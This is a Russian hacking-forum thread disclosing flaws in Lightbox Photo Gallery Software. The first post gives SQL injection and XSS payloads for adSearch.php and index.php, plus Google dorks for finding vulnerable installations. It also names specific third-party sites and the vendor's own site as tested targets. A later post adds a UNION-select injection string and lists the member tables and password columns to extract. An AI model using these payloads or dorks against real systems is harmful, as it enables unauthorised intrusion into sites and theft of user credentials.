ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Множественные уязвимости в платной фотогалерее Lightbox Photo Gallery Software
  #1  
Старый 13.11.2006, 20:41
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию Множественные уязвимости в платной фотогалерее Lightbox Photo Gallery Software

В версиях Advanced и Proffessional существует возможность проведения SQL - injection из-за отсутствия фильтрации спец. символов в переменной search_fields[]в скрипте adSearch.php (расширенный поиск).

Пример:
_http://www.gardenvisit.com/royalty-free-images/photos/adSearch.php
Код:
 POST: search_mode=search&keyword=%27&search_in=all&search_fields%5B%5D=dis_name&search_fields%5B%5D=description&search_fields%5B%5D=author&search_fields%5B%5D=copyright&search_fields%5B%5D=keywords&search_fields%5B%5D=ipts))/*&operand=OR&submit=Search
Во всех версиях существует возможность проведения XSS (в этом скрипте это может быть использовано, напрмер, для доступа к приватной фотогалерее..)

Уязвимы 2 параметра: email и category.

Пример:
_http://lightbox.adventistevangelism.com/index.php
POST: category=%3Ch1%3EHidook!


Google trick (dorks):
SQL:
Powered by Lightbox Photo Gallery Software & VSS ADVANCED SEARCH
XSS: inurl:lightbox inurl:category

По хорошей традиции решил проверить сайт разработчика бажного скрипта и вот что нашёл:

_http://www.lightboxphoto.com/phpinfo.php
Старенький Линух.
Наша XSS:
_http://www.lightboxphoto.com/sales_gallery/index.php
POST: lightbox=&category=%3Ch1%3EOumph!%3C/h1%3E

Наша SQL:
_http://www.lightboxphoto.com/gallery_software_ent_demo/adSearch.php
Код:
 POST: search_mode=search&keyword=%27&search_in=all&search_fields%5B%5D=dis_name&search_fields%5B%5D=description&search_fields%5B%5D=author&search_fields%5B%5D=copyright&search_fields%5B%5D=keywords&search_fields%5B%5D=iptn))/*&operand=OR&submit=Search

Кроме того можно узнать полный путь из-за отсутствия
фильтрации переменных, передаваемых в cookies. (возможно, это справедливо для всех сайтов, на которых установлен данный скрипт....)

Warning: Cannot modify header information - headers already sent by (output started at
/home/lightbox/public_html/sales_gallery/include/session_save_path.inc.php:7) in /home/lightbox/public_html/sales_gallery/include/session.inc.php on line 26


P. S. Настоятельно рекомендуя проверять скрипт на наличие директории config.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.

Последний раз редактировалось PinkPanther; 03.12.2006 в 03:43..
 
Ответить с цитированием

  #2  
Старый 16.01.2009, 19:41
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

Lightbox Photo Gallery Software

еще SQL-injection
Цитата:
/index.php?pageId=100&id=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
таблики:
Цитата:
vss_category_members:id
vss_category_members:category_path
vss_category_members:category_name
vss_category_members:username
vss_category_members:last_update
vss_category_members: password
либо:
vss_members:id
vss_members:category_path
vss_members:category_name
vss_members:username
vss_members:last_update
vss_members: password

Последний раз редактировалось aka PSIH; 16.01.2009 в 19:58..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36
Действующие уязвимости почтовых систем РФ Maxmen E-Mail 16 12.12.2004 16:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ